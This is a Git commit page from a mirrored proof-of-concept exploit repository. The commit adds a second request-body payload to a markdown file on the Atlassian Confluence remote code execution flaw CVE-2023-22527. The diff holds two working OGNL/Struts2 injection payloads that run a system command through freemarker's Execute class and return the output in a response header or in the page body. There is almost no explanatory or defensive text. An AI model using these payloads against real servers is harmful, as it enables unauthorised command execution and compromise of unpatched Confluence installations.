admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md

Browse Source
This commit is contained in:
wy876 2024-01-25 15:23:02 +08:00 committed by GitHub
parent 2039be2f61
commit 9b588bd9bd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527).md
View File

@ -32,6 +32,12 @@ Content-Type: application/x-www-form-urlencoded
Content-Length: 285 Content-Length: 285
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})) label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
```
回显在body exp
```
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter.write((new+freemarker.template.utility.Execute()).exec({"id"}))
``` ```
![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461) ![image](https://github.com/wy876/POC/assets/139549762/60ed0618-c378-49c4-bbdc-c7c8067cb461)